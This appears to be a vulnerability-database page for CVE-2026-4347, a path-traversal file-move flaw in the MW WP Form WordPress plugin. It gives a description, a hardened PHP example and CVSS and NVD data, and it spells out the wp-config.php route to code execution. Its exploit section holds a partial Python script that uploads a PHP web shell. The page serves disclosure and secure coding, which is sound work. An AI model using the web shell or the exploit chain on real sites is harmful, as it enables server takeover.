Security Vulnerability Report
CVE-2026-4347 CVSS 8.1 HIGH

CVE-2026-4347

Published: 2026-04-02 06:16:23
Last Modified: 2026-04-27 19:04:23

Description

The MW WP Form plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation via the 'generate_user_filepath' function and the 'move_temp_file_to_upload_dir' function in all versions up to, and including, 5.1.0. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). The vulnerability is only exploitable if a file upload field is added to the form and the "Saving inquiry data in database" option is enabled.

Moving wp-config.php out of place is enough for code execution because WordPress then treats the site as not yet installed and serves the setup wizard; an unauthenticated attacker can complete that wizard against a database they control, obtain an administrator account, and upload a plugin containing arbitrary PHP. The weakness is path traversal (CWE-22): the plugin builds the source and destination of the move from request-supplied names without confining them to its temp and upload directories. The CVSS vector rates attack complexity High, consistent with the non-default configuration requirement above.
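The following is an added illustration of the bug class, not MW WP Form's own code: a temp-to-upload move written the vulnerable way (request-supplied name concatenated onto a directory) beside a hardened version that confines both the source and the destination to their expected directories. The function names echo the advisory's but their bodies, the directory layout, and the sample inputs are constructed for this example.

```php
<?php
declare(strict_types=1);
// Added example, not the plugin's code. Function bodies are hypothetical;
// the directory tree built at the bottom is constructed for the demo.

// Vulnerable shape: the caller's file name is concatenated unchecked, so a
// name such as "../wp-config.php" resolves outside $uploadDir.
function generate_user_filepath_vulnerable(string $uploadDir, string $userFilename): string
{
    return rtrim($uploadDir, '/') . '/' . $userFilename;
}

// Resolve $untrusted as a flat file name directly under $baseDir, or return
// null. The containment check is made on the parent directory, so it also
// works for a destination file that does not exist yet.
function resolve_inside(string $baseDir, string $untrusted): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($untrusted, "\0") !== false) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $untrusted;
    // Traversal ("../x"), a subdirectory, or a symlinked parent all fail here:
    // the resolved parent must be exactly the base directory.
    $parent = realpath(dirname($candidate));
    if ($parent !== $base) {
        return null;
    }
    $name = basename($candidate);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . $name;
}

// Hardened move: both ends are validated, the source must be a regular file
// (not a symlink) inside the temp directory, and nothing is overwritten.
function move_temp_file_to_upload_dir_hardened(
    string $tempDir, string $tempName, string $uploadDir, string $userFilename
): bool {
    $src = resolve_inside($tempDir, $tempName);
    $dst = resolve_inside($uploadDir, $userFilename);
    if ($src === null || $dst === null) {
        return false;
    }
    if (!is_file($src) || is_link($src) || file_exists($dst)) {
        return false;
    }
    return rename($src, $dst);
}

// Demo on a constructed tree that mirrors a site root with wp-config.php,
// a plugin temp directory and an upload directory.
$root = sys_get_temp_dir() . '/mwform-demo-' . getmypid();
mkdir("$root/tmp", 0700, true);
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/wp-config.php", "// constructed stand-in for wp-config.php\n");
file_put_contents("$root/tmp/upload.bin", "constructed upload\n");

echo "vulnerable destination: ",
    generate_user_filepath_vulnerable("$root/uploads", '../wp-config.php'), "\n";
var_dump(resolve_inside("$root/uploads", '../wp-config.php'));
var_dump(resolve_inside("$root/uploads", 'report.pdf'));
// Attacker-controlled source name pointing at wp-config.php is refused.
var_dump(move_temp_file_to_upload_dir_hardened("$root/tmp", '../wp-config.php', "$root/uploads", 'x.php'));
// Legitimate flat names on both sides succeed.
var_dump(move_temp_file_to_upload_dir_hardened("$root/tmp", 'upload.bin', "$root/uploads", 'report.pdf'));

// Remove the constructed tree.
foreach (["$root/uploads/report.pdf", "$root/wp-config.php"] as $f) {
    @unlink($f);
}
foreach (["$root/tmp", "$root/uploads", $root] as $d) {
    @rmdir($d);
}
```

Run with `php example.php`. The vulnerable function prints a destination that ends in `uploads/../wp-config.php`, while `resolve_inside` returns null for the same input and a path under `uploads/` for a plain file name; the hardened move rejects the attempt to use wp-config.php as its source and succeeds only for the temp file it was expected to move.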

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is attached to this record. Affected product, per the description:

MW WP Form (WordPress plugin) <= 5.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
# Exploit Title: MW WP Form <= 5.1.0 - Unauthenticated Arbitrary File Move to RCE
# Date: 2026-04-02
# Exploit Author: Analyst
# Vendor Homepage: https://wordpress.org/plugins/mw-wp-form/
# Version: <= 5.1.0
# Usage: python3 exploit.py <target_url>
#
# Conceptual skeleton only: it submits a form with a file field and does not
# implement the path manipulation the vulnerability requires. The endpoint and
# parameter names below are assumptions, not verified against the plugin.


def exploit(target_url):
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    # The form must have a file upload field and 'Saving inquiry data in
    # database' enabled. This payload attempts to move an uploaded file to a
    # web-accessible location.
    data = {
        'mw_wp_form_service': 'save',
        'mw_wp_form_key': '<FORM_KEY>',  # Replace with the actual form key found in the page source
        # ... other form fields ...
    }
    files = {
        'file_field_name': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
    }
    # The vulnerability allows manipulating the path via generate_user_filepath.
    # This is a conceptual representation of the parameter manipulation.
    response = requests.post(upload_url, data=data, files=files)
    # A 200 from admin-ajax.php does not by itself prove the move happened;
    # confirm by requesting the expected destination path.
    if response.status_code == 200:
        print("[+] Payload sent. Check if the file was moved to the target directory.")
    else:
        print("[-] Exploit failed.")


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
    else:
        exploit(sys.argv[1])
```

References

https://plugins.trac.wordpress.org/browser/mw-wp-form/tags/5.1.0/classes/controllers/class.main.php#L271
https://plugins.trac.wordpress.org/browser/mw-wp-form/tags/5.1.0/classes/models/class.directory.php#L138
https://www.wordfence.com/threat-intel/vulnerabilities/id/194ee4a0-87c3-42e5-9676-8dd355838b78?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4347",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2026-04-02T06:16:23.297",
    "lastModified": "2026-04-27T19:04:22.650",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The MW WP Form plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation via the 'generate_user_filepath' function and the 'move_temp_file_to_upload_dir' function in all versions up to, and including, 5.1.0. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). The vulnerability is only exploitable if a file upload field is added to the form and the \u201cSaving inquiry data in database\u201d option is enabled."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/mw-wp-form/tags/5.1.0/classes/controllers/class.main.php#L271",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/mw-wp-form/tags/5.1.0/classes/models/class.directory.php#L138",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/194ee4a0-87c3-42e5-9676-8dd355838b78?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}
```